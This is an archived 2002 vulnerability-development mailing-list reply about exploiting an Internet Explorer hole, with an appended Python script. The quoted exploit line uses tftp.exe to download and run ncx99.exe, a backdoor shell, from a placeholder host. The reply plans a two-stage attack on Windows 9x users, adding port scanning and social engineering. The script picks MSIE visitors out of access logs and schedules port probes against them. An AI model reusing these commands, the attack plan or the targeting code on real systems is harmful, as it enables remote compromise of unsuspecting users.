Vulnerability Development mailing list archives

RE: Rather large MSIE-hole


From: "Wall, Kevin" <Kevin.Wall () qwest com>
Date: Thu, 14 Mar 2002 13:37:10 -0500

Felipe Franciosi wrote...

var programName=new Array(
     'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
     'c:/winnt/system32/ncx99.exe'
 );

MS Windows 9x doesn't have a trivial FTP client by default... I was
thinking about how this could be exploitable on these versions...

The FTP client offers the option to read a text-file containing
line separated commands.

But I couldn't get something like this to work:
var prog...
      'c:/command.com /c echo bin > c:/list.txt',
      'c:/command.com /c echo GET something >> c:/list.txt'

This won't create 'list.txt'... Any ideas why? Or how someone could
get around it?

On Win9x systems, rather than targeting FTP or a command shell,
what about starting up something that simply causes an exploitable
process to listen on some port # (will vary, depending on
application) and then separately trying to exploit that. One
could monitor one's web server access logs to notice when someone downloaded
the first half of the exploit (the innerHTML hole).
(Alternately, write a servlet/JSP/CGI script and you don't
even need to monitor the log file.)

If the User-Agent corresponds to MSIE, then at some time later
(perhaps t minutes later), gently port scan the remote
IP address to see if the application was launched. If the port
scan succeeds, then go into full exploit mode. (This assumes an
exploitable application that is normally not running and no
pesky personal firewalls, etc. to be sure. But certainly some
combinations would be vulnerable given the cluelessness of the
typical Windoze users and their disdain for ever updating their
system with security patches.) A bigger assumption is choosing
an exploitable application that (preferably) launches without
user intervention and without requiring any command line arguments. I
don't know that much about Windoze apps, so all I have is one
candidate application [see below.] (I do all my development
for Solaris; I just have to use WinNT & LookOut! from work--sigh).

However, the "Personal Web Server" that comes with Win98 (and
perhaps other Windoze systems?) comes to mind as a possibility.
The Personal Web Server is so full of holes that the executable
name is probably 'swisscheese.exe'. I seem to recall doing a
Win9x re-install for a friend where I think I was prompted as
to whether I wanted to RUN it, but I don't remember it prompting
if I wanted to load it. IIRC, that might mean that it was
installed, but just not started, by default. (Or perhaps it's
part of a commonly chosen package.) I never ran PWS, so I don't
know if the Personal Web Server needs to be configured first to
run or what. (If so, perhaps a bit of social engineering is in
order. Tell people that a certain wizard dialog box is going to
pop up, and give them instructions on how to configure it,
making up some excuse as to why they should do this. Surely
someone would fall for it.) The "good" thing about the
Personal Web Server is that I believe Microsoft's attitude
toward its security vulnerabilities has been pretty
much to ignore them and to tell people to run IIS instead (since
IIS is so much more secure ;-).

Anyway, just my $.02 worth. BTW, just so you know, these are
my personal opinions and in no way reflect the views of my
company.
---
Kevin W. Wall   Qwest IT, Inc. / Security Infrastructure Dev Team
Kevin.Wall () qwest com Phone: 614.932.5542
"Wipe Info uses hexadecimal values to wipe files. This provides more
security than wiping with decimal values."
                -- Norton System Works 2002 manual, pg 160

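The log-watching half of the scheme sketched in the reply above, written out as an added example (it is not code from the original post or from either poster): parse web server access log lines, keep only MSIE clients that fetched the first-stage page, schedule a follow-up t minutes after the fetch, and do a single TCP connect check rather than a sweep. The Apache "combined" log format, the path /stage1.html, the 5-minute delay and the sample log lines are all assumptions constructed for the example; nothing here depends on any particular listening application.

```python
"""Added example, not part of the original post: watch an access log for MSIE
clients that fetched the first-stage page, then re-check each one later for a
single listening port. Log format, path and sample lines are assumptions."""
import re
import socket
from datetime import datetime, timedelta

# Hypothetical path of the page carrying the first half of the exploit.
STAGE1_PATH = "/stage1.html"

# Apache "combined" log format (assumed); fields we care about are named.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample lines for the example; not a real log.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Mar/2002:13:01:07 -0500] "GET /stage1.html HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
10.0.0.9 - - [14/Mar/2002:13:02:11 -0500] "GET /stage1.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.8) Gecko/20020204"
10.0.0.5 - - [14/Mar/2002:13:02:30 -0500] "GET /stage1.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
10.0.0.12 - - [14/Mar/2002:13:03:42 -0500] "GET /index.html HTTP/1.0" 200 812 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
10.0.0.21 - - [14/Mar/2002:13:04:55 -0500] "GET /stage1.html HTTP/1.0" 200 1532 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
"""


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def is_msie(ua):
    # Old Opera builds also put "MSIE" in their User-Agent while spoofing IE;
    # exclude them so only real IE clients get scheduled.
    return "MSIE" in ua and "Opera" not in ua


def candidates(log_text, path=STAGE1_PATH, delay_minutes=5):
    """Map client IP -> earliest time to probe, for MSIE clients that got `path`.
    200 and 304 both count: either way the page (and its script) reached the client.
    The earliest fetch per IP wins so a repeat visit does not push the probe back."""
    due = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["path"] != path or rec["status"] not in (200, 304):
            continue
        if not is_msie(rec["ua"]):
            continue
        when = rec["ts"] + timedelta(minutes=delay_minutes)
        if rec["ip"] not in due or when < due[rec["ip"]]:
            due[rec["ip"]] = when
    return due


def port_open(ip, port, timeout=2.0):
    """One TCP connect to one port: the "gentle" check, not a port sweep."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False


def self_check():
    """Exercise port_open against a loopback listener opened here.
    Returns (result while listening, result after the listener is closed)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    try:
        hit = port_open("127.0.0.1", port, timeout=1.0)
    finally:
        srv.close()
    miss = port_open("127.0.0.1", port, timeout=1.0)
    return hit, miss


if __name__ == "__main__":
    for ip, when in sorted(candidates(SAMPLE_LOG).items()):
        print(f"{ip}: probe no earlier than {when.isoformat()}")
    print("loopback self-check (open, closed):", self_check())
```

On the constructed sample, only 10.0.0.5 and 10.0.0.21 are scheduled: the Gecko client is dropped by the User-Agent test and 10.0.0.12 never fetched the first-stage page. The same parser is what a defender would run the other way round, looking for an unexpected page being served to IE clients followed by a new listener appearing on their hosts.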